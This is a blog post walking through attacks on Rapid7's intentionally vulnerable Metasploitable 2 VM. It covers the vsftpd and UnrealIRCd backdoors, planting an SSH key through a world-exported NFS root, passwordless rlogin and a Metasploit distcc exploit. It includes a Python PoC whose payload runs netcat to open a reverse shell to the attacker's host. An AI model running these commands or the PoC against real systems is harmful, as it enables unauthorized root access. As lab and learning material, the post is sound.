In this post I’m going to be exploring Metasploitable 2.
Metasploitable2 is a vulnerable machine from the good folks at Rapid7. It is “an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.”
Ok, let’s get to it.
A quick nmap of the host to see which services are running:
user@kali:~$ nmap 172.16.255.138 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-05-17 17:51 CDT Nmap scan report for 172.16.255.138 Host is up (0.0023s latency). Not shown: 978 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 8180/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 13.28 seconds
Nearly all of these services provide a direct entry point for us. From here, I will go one-by-one and cover how to exploit the ones that are exploitable.
Regarding HTTP: Metasploitable2’s web-app component is robust. It contains the “Damn Vulnerable Web App” as well as some other vulnerable web applications like NOWASP Mutillidae, phpMyAdmin, tikiwiki, and WebDav. I’ve gone through those as well, but since it could fill a whole post on its own I’ll be saving that to cover another day. This time we’re just going to be penetrating the other vulnerable services.
The host is running a vulnerable ftp server:
user@kali:~$ nmap -sV -p 21 172.16.255.138 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-05-17 17:55 CDT Nmap scan report for 172.16.255.138 Host is up (0.00066s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.33 seconds
Version 2.3.4 of vsftpd contains a known back door. If a user tries to authenticate with a “:)” smiley face in their username, the host will open a bind shell on TCP port 6200.
user@kali:~$ ftp 172.16.255.138 Connected to 172.16.255.138. 220 (vsFTPd 2.3.4) Name (172.16.255.138:user): hacker:) 331 Please specify the password. Password:
At which point the server will appear to hang. But if we connect to port 6200:
user@kali:~$ ncat -v 172.16.255.138 6200 Ncat: Version 7.25BETA1 ( https://nmap.org/ncat ) Ncat: Connected to 172.16.255.138:6200. id uid=0(root) gid=0(root)
We find a root shell.
NFS and SSH
The host serves NFS, and is misconfigured to share its root directory publicly:
user@kali:~$ showmount -e 172.16.255.138 Export list for 172.16.255.138 / *
We simply mount the share, and copy our ssh key into its authorized keys file:
root@kali:~# mkdir /tmp/metasploitable2 root@kali:~# mount -t nfs 172.16.255.138:/ /tmp/metasploitable2 root@kali:~# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /root/.ssh/id_rsa already exists. Overwrite (y/n)? y Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. The key fingerprint is: SHA256:BpNPzUAgrHze66YBnpOoxChRyhWhq4JQwfFwVNL/5Z4 root@kali The key's randomart image is: +---[RSA 2048]----+ | .+**oooo | | o=oo.. + | | ooo. +.. o | |.+= . =. . | |+o.o . S. o | |*+ +. .. . . | |Bo= . . . . | |= . .o E | |. .+. | +----[SHA256]-----+ root@kali:~# cat ~/.ssh/id_rsa.pub >> /tmp/metasploitable2/root/.ssh/authorized_keys root@kali:~# umount /tmp/metasploitable2 root@kali:~# rmdir /tmp/metasploitable2
And then successfully log in as root:
root@kali:~# ssh firstname.lastname@example.org [...] root@metasploitable:~# id uid=0(root) gid=0(root) groups=0(root)
The ports 512, 513 and 514 are open, indicating rlogin is enabled.
I test it out, and discover I can login as root with no password:
user@kali:~$ rlogin email@example.com [...] root@metasploitable:~# id uid=0(root) gid=0(root) groups=0(root)
Too bad they can’t all be so easy! ;)
The IRC service is UnrealIRCd 22.214.171.124:
user@kali:~$ nmap -sV -p 6667 172.16.255.138 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-05-17 13:11 CDT Nmap scan report for 172.16.255.138 Host is up (0.0018s latency). PORT STATE SERVICE VERSION 6667/tcp open irc Unreal ircd Service Info: Host: irc.Metasploitable.LAN
Which has a known backdoor triggered by sending “AB” + system commands.
Instead of using the Metasploit module, however, I’m going to write my own PoC.
#!/usr/bin/python import socket rhost = '172.16.255.138' rport = 6667 payload = "AB;" + 'nc 172.16.255.133 80 -e /bin/sh;' + "\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((rhost, rport)) print(s.recv(1024)) s.send(payload) s.close()
It’s a bit minimalist, but it will work. This script will connect to the vulnerable service and use netcat to send a reverse shell to my attacking machine on port 80.
user@kali:~$ chmod u+x unreal.py user@kali:~$ ./unreal.py :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
Meanwhile I have an ncat listener waiting:
root@kali:~# ncat -v -lp 80 Ncat: Version 7.25BETA1 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from 172.16.255.138. Ncat: Connection from 172.16.255.138:56391. id uid=0(root) gid=0(root)
Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. It makes it easy to scale large compiler jobs across multiple systems. It’s also a gaping security hole for us to punch through.
This time I’ll be turning to Metasploit to exploit the vulnerability.
msf > use exploit/unix/misc/distcc_exec msf exploit(distcc_exec) > set RHOST 172.16.255.138 msf exploit(distcc_exec) > exploit [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo al9BfrqMBh5PC0Yo; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "al9BfrqMBh5PC0Yo\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (172.16.255.138:4444 -> 172.16.255.130:38897) at 2017-04-16 16:23:15 -0700 id uid=1(daemon) gid=1(daemon) groups=1(daemon)
Simple. Metasploit makes exploitation a breeze.
Many of the accounts on Metasploitable2 use weak or default credentials. These can be bruteforced using tools like Hydra or Medusa, or even just guessed (e.g. “user:user”, “msfadmin:msfadmin”)
Metasploitable2 was my first intentionally vulnerable VM to attack and exploit. It was a lot of fun and I’m looking forward to moving on to harder challenges.
Until next time, EOF